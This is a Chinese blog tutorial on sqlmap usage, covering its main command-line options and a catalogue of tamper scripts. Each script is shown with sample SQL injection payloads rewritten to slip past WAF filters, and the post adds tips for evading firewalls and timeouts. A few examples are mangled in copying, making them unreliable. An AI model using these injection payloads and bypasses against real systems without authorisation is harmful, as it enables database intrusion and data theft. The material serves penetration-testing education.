sqlmap常用技巧整理-常用参数和temper(来自乌云)

通过在乌云网上出现的很多SQL注入漏洞,因此来总结一下,大致使用SQLMAP所遇到的参数。

基本结构

基本SQLMAP的使用方式就如下所示,使用参数式的方式,按需求添加。


sqlmap.py -u"http:// *"--data="a=b"-p a  --level3--random-agent --referer="a"

--technique T --dbms=mysql --cookie="cookie"--tables

参数解释

星号

在注入的过程中,有时候是伪静态的页面,可以使用星号表示可能存在注入的部分

–data

使用post方式提交的时候,就需要用到data参数了

-p

当我们已经事先知道哪一个参数存在注入就可以直接使用-p来指定,从而减少运行时间

–level

不同的level等级,SQLMAP所采用的策略也不近相同,当–level的参数设定为2或者2以上的时候,sqlmap会尝试注入Cookie参数;当–level参数设定为3或者3以上的时候,会尝试对User-Angent,referer进行注入。

–random-agent

使用该参数,SQLMAP会自动的添加useragent参数,如果你知道它要求你用某一种agent,你也应当用user-agent选项自己指定所需的agent

–technique

这个参数可以指定SQLMAP使用的探测技术,默认情况下会测试所有的方式。

支持的探测方式如下:

B: Boolean-based blind SQL injection(布尔型注入)

E: Error-based SQL injection(报错型注入)

U: UNION query SQL injection(可联合查询注入)

S: Stacked queries SQL injection(可多语句查询注入)

T: Time-based blind SQL injection(基于时间延迟注入)

–tamper

有些时候网站会过滤掉各种字符,可以用tamper来解决(对付某些waf时也有成效)

–tamper=”space2comment.py”

理论是用/**/代替空格,当然temper的选项还有很多

apostrophemask.py

作用:用utf8代替引号

equaltolike.py

作用:like 代替等号

Example:

Input: SELECT * FROM users WHERE id=1

Output: SELECT * FROM users WHERE id LIKE1

space2dash.py

作用:绕过过滤‘=’ 替换空格字符(”),(’ – ‘)后跟一个破折号注释,一个随机字符串和一个新行(’ n’)

Example:

('1 AND 9227=9227')'1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'

greatest.py

作用:绕过过滤’>’ ,用GREATEST替换大于号。

Example:

('1 AND A > B')'1 AND GREATEST(A,B+1)=A'

space2hash.py

作用:空格替换为#号 随机字符串 以及换行符

Example:

1

2

Input:1AND9227=9227

Output:1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227

apostrophenullencode.py

作用:绕过过滤双引号,替换字符和双引号。

Example:

1

tamper("1 AND '1'='1")'1 AND %00%271%00%27=%00%271'

halfversionedmorekeywords.py

作用:当数据库为mysql时绕过防火墙,每个关键字之前添加mysql版本评论

Example:

1

2

3

("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER()

AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa")

"value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"

space2morehash.py

作用:空格替换为 #号 以及更多随机字符串 换行符

Example:

Input:1AND9227=9227

Output:1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227

appendnullbyte.py

作用:在有效负荷结束位置加载零字节字符编码

Example:

1

('1 AND 1=1')'1 AND 1=1%00'

常用于access

ifnull2ifisnull.py

作用:绕过对 IFNULL 过滤。 替换类似’IFNULL(A, B)’为’IF(ISNULL(A), B, A)’

Example:

1

('IFNULL(1, 2)')'IF(ISNULL(1),2,1)'

space2mssqlblank.py(mssql)

作用:空格替换为其它空符号

Example:

1

2

Input: SELECT id FROM users *

Output: SELECT%08id%02FROM%0Fusers

base64encode.py

作用:用base64编码替换 Example: (“1’ AND SLEEP(5)#”) ‘MScgQU5EIFNMRUVQKDUpIw==’ Requirement: all

space2mssqlhash.py

作用:替换空格

Example:

1

('1 AND 9227=9227')'1%23%0AAND%23%0A9227=9227'

modsecurityversioned.py

作用:过滤空格,包含完整的查询版本注释

Example:

1

('1 AND 2>1--')'1 /*!30874AND 2>1*/--'

space2mysqlblank.py

作用:空格替换其它空白符号(mysql)

Example:

1

2

3

Input: SELECT id FROM users

Output: SELECT%0Bid%0BFROM%A0users

between.py

作用:用between替换大于号(>)

Example:

1

('1 AND A > B--')'1 AND A NOT BETWEEN 0 AND B--'

space2mysqldash.py

作用:替换空格字符(”)(’ – ‘)后跟一个破折号注释一个新行(’ n’)

注:之前有个mssql的 这个是mysql的

Example:

1

('1 AND 9227=9227')'1--%0AAND--%0A9227=9227'

multiplespaces.py

作用:围绕SQL关键字添加多个空格

Example:

1

('1 UNION SELECT foobar')'1 UNION SELECT foobar'

:space2plus.py

作用:用+替换空格

Example:

1

('SELECT id FROM users')'SELECT+id+FROM+users'

bluecoat.py

作用:代替空格字符后与一个有效的随机空白字符的SQL语句。 然后替换=为like

Example:

1

('SELECT id FROM users where id = 1')'SELECT%09id FROM users where id LIKE 1'

nonrecursivereplacement.py

双重查询语句。取代predefined SQL关键字with表示 suitable for替代(例如 .replace(“SELECT”、””)) filters

Example:

1

('1 UNION SELECT 2--')'1 UNIOUNIONN SELESELECTCT 2--'

space2randomblank.py

作用:代替空格字符(“”)从一个随机的空白字符可选字符的有效集

Example:

1

('SELECT id FROM users')'SELECT%0Did%0DFROM%0Ausers'

sp_password.py

作用:追加sp_password’从DBMS日志的自动模糊处理的有效载荷的末尾

Example:

1

('1 AND 9227=9227-- ')'1 AND 9227=9227-- sp\_password'

chardoubleencode.py

作用: 双url编码(不处理以编码的)

Example:

1

2

3

Input: SELECT FIELD FROM%20TABLE

Output: %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545

unionalltounion.py

作用:替换UNION ALL SELECT UNION SELECT

Example:

1

('-1 UNION ALL SELECT')'-1 UNION SELECT'

charencode.py

作用:url编码

Example:

1

2

3

Input: SELECT FIELD FROM%20TABLE

Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45

randomcase.py

作用:随机大小写 Example:

1

2

Input: INSERT

Output: InsERt

unmagicquotes.py

作用:宽字符绕过 GPC addslashes

Example:

1

2

3

Input:1′ AND1=1

Output:1%bf%27AND1=1–%20

randomcomments.py

作用:用/**/分割sql关键字

Example:

1

‘INSERT’ becomes ‘IN//S//ERT’

charunicodeencode.py

作用:字符串 unicode 编码

Example:

1

2

3

Input: SELECT FIELD%20FROM TABLE

Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′

securesphere.py

作用:追加特制的字符串

Example:

1

('1 AND 1=1')"1 AND 1=1 and '0having'='0having'"

versionedmorekeywords.py

作用:注释绕过

Example:

1

2

3

Input:1UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#

Output:1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS**!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#

space2comment.py

作用:Replaces space character (‘ ‘) with comments ‘/**/’

Example:

1

2

3

Input: SELECT id FROM users

Output: SELECT//id//FROM/**/users

halfversionedmorekeywords.py

作用:关键字前加注释

Example:

1

2

3

Input: value’ UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND ‘QDWa’='QDWa

Output: value’/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND ‘QDWa’='QDWa

有时发现跑出的数据都是毫无意义的字符

解决方案:

a)SQLMAP会提示你加–hex或者–no-cast,有时会有帮助

b)如果你用的是time-based注射,建议增加延时–time-sec等参数,即使你的网速比较好,但是服务器可能遇见各种奇怪环境

c)增加level的数值

暴力猜表

针对access站可以构造common-tables.txt

显示unable to connect to the target url

第一个可能是time-out设置的太小,出现问题,再有可能就是WAF直接把请求拦截掉了,因此得不到响应。

有些waf比较友善,过滤后会提示“参数不合法”,但是也有些waf则直接把请求拦下来无提示导致应答超时,这样在测试时会消耗大量的时间等待响应

解决方案:减少time-out进行检测,在跑数据时改回time-out

提示possible integer casting detected

如果是在手工测试,建议到这里可以停止了,节省时间。

如果是在扫描器扫描的盲注,那么到这里坚决无视警告继续下去。

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 213,864评论 6 494
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 91,175评论 3 387
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 159,401评论 0 349
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 57,170评论 1 286
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 66,276评论 6 385
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,364评论 1 292
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,401评论 3 412
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,179评论 0 269
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,604评论 1 306
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,902评论 2 328
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,070评论 1 341
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,751评论 4 337
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,380评论 3 319
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,077评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,312评论 1 267
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 46,924评论 2 365
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 43,957评论 2 351

推荐阅读更多精彩内容

  • sqlmap用户手册 说明:本文为转载,对原文中一些明显的拼写错误进行修正,并标注对自己有用的信息。 ======...
    wind_飘阅读 2,039评论 0 5
  • http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 当给sq...
    xuningbo阅读 10,285评论 2 22
  • Spring Cloud为开发人员提供了快速构建分布式系统中一些常见模式的工具(例如配置管理,服务发现,断路器,智...
    卡卡罗2017阅读 134,644评论 18 139
  • 日子过的很慢、期待又害怕 等待的日子总是那么....信任 加油
    Miss沫阅读 189评论 0 0
  • 目标 平常我们做iOS开发,会经常遇到打开其他的APP的功能。本篇文章讲的就是打开别人的APP的一些知识。我们的目...
    橙娃阅读 6,548评论 0 5